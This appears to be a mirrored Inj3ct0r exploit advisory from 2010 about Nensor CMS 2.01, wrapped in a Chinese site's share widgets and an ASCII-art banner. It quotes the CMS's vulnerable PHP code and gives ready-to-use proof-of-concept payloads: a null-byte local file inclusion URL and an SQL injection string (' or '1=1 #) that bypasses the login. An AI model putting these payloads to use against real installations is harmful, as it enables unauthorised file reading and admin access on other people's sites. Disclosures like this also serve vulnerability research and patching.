扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
=============================================== Nensor CMS 2.01 Multiple Remote Vulnerabilities =============================================== [+] Nensor CMS 2.01 Multiple Remote Vulnerabilities 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \__/'__<code>\/\ \__/'__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /' _ <code>\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/</code>'__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1######################################1 0I'm cr4wl3rmember from Inj3ct0r Team1 1######################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: cr4wl3r [+] My id: http://inj3ct0r.com/author/945 [+] Original : http://inj3ct0r.com/exploits/11346 [+] Download: http://code.google.com/p/nensor-cms/downloads/list [x] LFI: $sPage=(isset($_GET["page"]))?$_GET["page"]:""; if(is_file("".$sPage.".php")){ include "".$sPage.".php"; }elseif(is_file("".$sPage.".js")){ include "".$sPage.".js"; } [x] LFI PoC: [payh]/x/modules/javascript.php?sPage=[LFI%00] [x] Auth Bypass: $sql = "SELECT iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType FROM tb_users WHERE sUsername='".strInput($_POST["sUsername"])."' AND sPassword='".md5($_POST["sPassword"])."' AND bActive=1"; [x] PoC: ' or '1=1 # Inj3ct0r.com [2010-03-18] |
体验盒子
